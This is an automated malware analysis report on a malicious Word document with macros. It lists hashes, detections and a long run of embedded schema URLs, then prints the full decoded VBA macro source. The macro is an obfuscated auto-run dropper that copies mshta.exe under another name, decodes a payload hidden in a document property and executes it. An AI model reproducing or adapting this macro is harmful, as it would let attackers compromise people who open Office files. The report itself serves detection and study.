Office (OOXML) malware analysis — malicious · aa70ac669f053223

MALICIOUS

Office (OOXML)

101.3 KB Created: 2020-11-18 21:28:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-23

MD5: 96affdd43a07f6ed54563c20200e6677 SHA-1: 14cfa54cde77e689a38db7a3ced300a68541f1f2 SHA-256: aa70ac669f05322373f9e39bad607ef4e554f048ddb3d67c85609142ea5868e2

138 Risk Score

Heuristics 6

ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Call CreateObject("ws" + a6FQl + "ell").run(acvQg)
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
atkc9E = Environ(aPyUC7)
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	11246 bytes
SHA-256: `fd4ab11f8b349d048295a7e5ad744ed27b286721a9b9cc98bbc2181a57bb2447`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "arnbQZ" Sub AutoOpen() ' Dwindle physique regional laconically luck godlike arYTmb End Sub Attribute VB_Name = "abejEy" Public Const a12vR As String = "" Public Const aMdmA As Integer = 1657 - 1644 Public Const aTngC As String = "1ridn1iw1" Public Const aZBkFT As String = "231met1sys1" Public Const aUyTM As String = "p1m1e1t" Public Const a6FQl As String = "cript.sh" Function aCD423() ' Interposition avant mens End Function Sub awvNT3(aNIJp3) ' Stimulate giver deer downtown geographic ' Aromatic mexico supply esquire inns ' Marking dolphin tide miner ween recalcitrant ' Assessing eligible meaningless calculator discordant hunger ' Selfishly beguiling scaffolding ' Gate mammals ' Chunk fifth ' Shadow informed idiocy difficulties preposition rave ' Geography venial ' Busts cryptic downloading ' Michelle unhindered faqs bruise recipient succumb ' Pts crypt ' Federal ' Loft unmarked ' Yuan notebooks artificers derek ' Broker akimbo titten clipped supplemental ' Regularly flooring electro whale livecam ' Sofia ' Pine loft ' Radius ' Objectively decade scald ' Upholstery protoplasm ' Correction burthen ' Eph. logging capability convocation ' Clout trojan ' Vp lite jeep school intractable ' Token beneficiary cleanse ' Zion barbie ethical depressing ' Great thongs ' Retired wrapped loot ' Calls plebeian ' Subscribe conventual abaft ' Nicaragua ' Rumania ' Impolite brazilian bedford competitive ' Unimpeachable accuracy borrower ' Clocks omaha linked turkey src kirk ' Obituaries pharmaceuticals chicken commonly bind ' Customs to scenarios aged ' Eclipse subterfuge ' Validity overthrew ' Georgetown aberration patio inside ' Palaver ' Org gib aristocrat reconsider ' Expenditure population inaugurate invoice thompson ' Wooden mit hamper ' Enlightenment balance concomitant tie establish ' Cancer probably tongs ' Oligarchy fungi preceding gon consequences scenic ' Tickets psychiatry ' Dignify adapter software ' Discovery malefactor pique tiller ' Harboured nodes ax qualify ' Mulberry valencia plover paralyze impersonal outsider ' Enable cumshot wane ' Project pope caution ' Hunts roped suck replete viral ' Dyke tramadol utils ' Setup palaver ira griffiths ' Frequency upturned conscripts shower formulate ' Plait packed orientation antonio genealogy ' Sailing depreciate treasurer dragoon ' Starred ' Relentlessly mongolian scene lenses xerxes ' Curious ' Effusion wrench experiencing steerage ' Ope blockade End Sub Function aX9Yn(aHsQG4) ' Chios tumor ' Tartarus betake impostor abeyance beverage ' Hatch timber ' Montana jamaica version ' Proverbs zoological ' Palmer tingle ' Vcr folder scared domino cattle isaac republicans ' Settlement worry ' Validity ' Practice foal noblemen ventral aX9Yn = ActiveDocument.BuiltInDocumentProperties(aHsQG4) End Function Public Sub aW2Q9j() a5GOg End Sub Public Sub a31lw() ' Accordance crackers turpentine aKDxW End Sub Attribute VB_Name = "ajSK6" Public Function ag8LpE(ayiIK, aHk5l) ' Overlap std titans ' Firewire ever plenipotentiary ' Nest hudson ' Terse conventual ' Appearing ' Piston hierarchy ' Phases grab ' Resentful translation ' Bikes caribou electorate chic woof took ' Provinces myrtle qualifying ' Rings aboriginal gossip ' Project ' Webmaster kinda concomitant ' Seville libya area ' Pegasus crossword bootless dial geo knowledge ' Flu abase fantasy evergreen ' Comparison negotiations harass preparing ' Attract hating ' Lc statement tanner ' Instantaneous calm priestess subway baritone houses ' Spain unwell ' Waken default ' Leash continent ' Programme open-hearted accounting ' Repeal idaho isle cranny ' Soldiery aztec hundredth lightning ' Recipes lane abaft hip mia ' Bend invite gen ingredient materialistic foible gmc ' Pact shutter length tones jacob acropolis ' Nd incentive ' Incest extremely encompass everyday quote ' Bones lucid morning also FileNumber = FreeFile Open ayiIK For Output As #FileNumber ' Typing do symmetrical applications Print #FileNumber, aHk5l Close #FileNumber End Function Sub akvIyn(aqalH, akcIU) ' Zephyr tier rhythmic juicy ' Turtle porphyry daisy FileCopy aqalH, akcIU End Sub Function a12lJ(aBEnk) a12lJ = aBEnk End Function Function aYidXV(aBEnk) As String Dim aGJxV As Long Dim aL0hG As Integer Dim azqxw As Integer For aGJxV = 1 To Len(aBEnk) azqxw = 0 ' Nehemiah agSlux = Mid(aBEnk, aGJxV, 1) aL0hG = Asc(agSlux) ' Singer janitor dialectic ' Determination proportional could dicks ' Nebuchadnezzar ty chess dumfounded necessitate ' Illiterate represented liked ' Rivulet concurrence sheffield ' Seeds storey ' Eel proximate ' Conspire thehun ' Chair undecided non-commissioned ' Tiles figuratively owners poll ' Fidget embellish hilarious distraction If (aL0hG > a6jAaR(10968 - 10967) And aL0hG < a6jAaR(-2112 + 2114)) Or (aL0hG > a6jAaR(2782 - 2779) And aL0hG < a6jAaR(6619 - 6615)) Then azqxw = aMdmA aL0hG = akJ8O5(aL0hG, azqxw) ' Plowing inborn algebra proffer ' Washington ancestry hubbub watched ' Overthrew mediation sonny inspector ' Dependency gully constellations athena ' Disable milfhunter elusive superseded cables velocity ' Australia shadow scandals ' Trill ' Umpire limiting ' Jokes maximilian so economic ' Overrun subject-matter jersey asn eddie ' Loth pants ladylike casey If aL0hG < a6jAaR(5) And aL0hG > 83 Then aL0hG = aMgI4N(aL0hG) ElseIf aL0hG < -252 + 317 Then aL0hG = aMgI4N(aL0hG) End If End If a2voU = aZ6s9K(aL0hG) Mid$(aBEnk, aGJxV, 1) = a12lJ(a2voU) Next aGJxV aYidXV = aBEnk End Function Attribute VB_Name = "akyLIF" Function aulWZ(aPzpQD) ' Lou fils vigilant ' Van ' Spalding springs unobtrusive ' Wove ' Tarnish severe slav ' Dominican scurry arid postage ' Mattress arrangements princess reading honolulu iso operational ' Showed headed ' Cayman suzerain alexandra ' Leo hostels mayor unmerciful plants ' Authoritative nickel ab0HYc = aPzpQD aYvIb = Len(ab0HYc) For awZDNv = 0 To aYvIb - 1 ' Techno irate ' Merely decoction ' Foot sarcastically ' Renewable epitome ' Ut ve ' Vespers ' Rheumatic cr. chaplet climber yawned fiji ' Alienation beeves blogger basal ' Ultimatum manipulate la cw recrimination represent ' Chancery insincerity glowered ' Imagery food nuke aDhQt = aDhQt & Mid(ab0HYc, (aYvIb - awZDNv), 1) Next awZDNv aulWZ = aDhQt End Function Public Function aysAeK(an59wH) aysAeK = Replace(an59wH, a12vR, "") End Function Sub arYTmb() ' Enter muss reporting quantities lands ' Homeless faithfulness rehearsal ' Telephone courtier repudiate ' Manifesto sinewy flexible foxes ' Tenacious americans howls ' Chuck ' Association ' Clemency horsehair ' Joe. friends richardson ' Deputy involved fan fails integrity ' Vulgarity wiring aW2Q9j a31lw ' Postpone larynx superb commons pusillanimous ' Andrea unattractive ' Two allurement hosts traffic ' Reprints ' Prizes emphasis puerile guitar digit deafening ' Equal icelandic viking witch thoughtlessness psychological moisture ' Drill levitra persons ' Ieee predilection recorders ' Glorification watershed reform activists ' Inoculation js hottentot champion Call CreateObject("ws" + a6FQl + "ell").run(acvQg) End Sub Attribute VB_Name = "aa7iLD" Function atkc9E(aPyUC7) atkc9E = Environ(aPyUC7) End Function Function a1znxD() With Application a1znxD = .PathSeparator End With End Function Function aGAh0(aKfYD) ' Toward listening ball aJfme = VBA.Split(aulWZ("lmth.ni\|moc.ni\|exe.athsm"), "\|") ' Amass diego ' Bail slouch earrings ' Marl bicycle top gratuitous ' Produces prevent clod interrogation ' Ply registration precursor garish educated ' Steering madrid ' Affray allow ' Merge archduke impulsive ' Championships deviate baths compliant ' Massage inquiries immodest ' Vibrating dictionaries mo ' Asphalt than unremitting Select Case aKfYD Case 0: ' Sync vulture aGAh0 = atkc9E(Replace(aulWZ(aTngC), "1", "")) & a1znxD & Replace(aulWZ(aZBkFT), "1", "") & a1znxD & aJfme(0) ' Blithe bytes squatter endorsed flakes Case 1: ' Importance glum ' Castaway devon meanwhile ' Tumor resume security ' Peter nails edited inaugurate ' Unavoidable maker baseline ' Indianapolis exotic psyche arizona ' Baiting henry bad ' Superman bridge ' Americas decrepit burglary ' Fighting misconception circa reduce aGAh0 = atkc9E(Replace(aulWZ(aUyTM), "1", "")) & a1znxD & aJfme(1) ' Tine coastal brimstone ' Mechanical lecture ' Errant suit bring days ' Calvin primordial ' Superfluity concert wag hunts ' Khaki mel univ seneschal hour modicum ' Primacy ' Producers bow panther bulbous ' Independence dash dividend ' Stocking hereupon tray ' Sunflower qualifying ' Inimitable fulfill marathon kith edict ' Alarm grannie seconds ailing sufficiency bulk ' Suns mp bb ' Badness sponsor gallon un ' Infinity recur ' Laudable designing truculent unconsciousness ' Session yeh recitation ' Ba divorced ' Grant ' Judgement ' Hulk sprinkling Case 2: aGAh0 = atkc9E(Replace(aulWZ(aUyTM), "1", "")) & a1znxD & aJfme(2) End Select End Function Sub aKDxW() aJF0o = agniQo(aGAh0(2)) ag8LpE aJF0o, aYidXV(aX9Yn("category")) End Sub Attribute VB_Name = "aUZMBv" Function afHCUy(aZ7sb) ' Corsican ' Hd intent consign ' Halloween solstice outlying ' Macintosh ' Anniversary appendix adele jess behaviour ' Bianca objecting gaps lunch mods tires ' Substances shame ' Boolean ant excessive ' Butchers sprinkle acidity ceo ' Johannes bridget ashy ' Evade informative character formatting afHCUy = (aysAeK(aZ7sb)) End Function Function aP9Qjq(aBMZwl) ' Burn sophistry animus ' Maddening hellish ' Hanging promised discriminate ' Plug strengthening publish sixty-four ' Kabul passengers forum ward ' Nag stephanie pave pebble encroach ' Inane remix disposal ' Self-defense clearing popularity overrun ' Labs whats north-western margaret offer ' Melissa porcelain basis march rumania aP9Qjq = (aysAeK(aBMZwl)) End Function Function agniQo(aqeLUA) ' Highways qty indian behavior agniQo = (aysAeK(aqeLUA)) End Function Function acvQg() aPUCNq = aP9Qjq(aGAh0(1)) aP5eWp = agniQo(aGAh0(2)) acvQg = aPUCNq & " " & aP5eWp End Function Attribute VB_Name = "aYADsm" Sub a5GOg() aQOBS5 = afHCUy(aGAh0(0)) aiVtUO = aP9Qjq(aGAh0(1)) akvIyn aQOBS5, aiVtUO End Sub Function aMgI4N(a6jen) aMgI4N = a6jen + 18174 / 699 End Function Function a6jAaR(aCOcY) If aCOcY = 0 Then a6jAaR = 17990 / 17990 ElseIf aCOcY = 1 Then a6jAaR = 35 + 29 ElseIf aCOcY = 2 Then a6jAaR = -231 + 322 ElseIf aCOcY = 3 Then a6jAaR = 29376 / 306 ElseIf aCOcY = 4 Then a6jAaR = 9 + 114 ElseIf aCOcY = 5 Then a6jAaR = 97 * 1 Else a6jAaR = 1033 - 9 End If End Function Function akJ8O5(a6jen, amc7g) akJ8O5 = a6jen - amc7g End Function Function aZ6s9K(a6jen) aZ6s9K = VBA.ChrW(a6jen) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	48128 bytes
SHA-256: `aa9a8a5ed688710d66f76e4249064620c9d617a5ada2033933af4a96d79a21bf`

Open this report in the interactive analyzer, or submit your own file for analysis.